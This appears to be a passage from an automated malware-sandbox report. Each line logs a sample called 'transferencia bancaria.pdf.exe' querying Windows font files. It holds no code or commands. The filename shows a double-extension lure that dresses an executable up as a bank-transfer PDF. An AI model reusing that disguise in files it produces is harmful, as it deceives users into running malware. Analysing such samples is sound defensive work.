Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
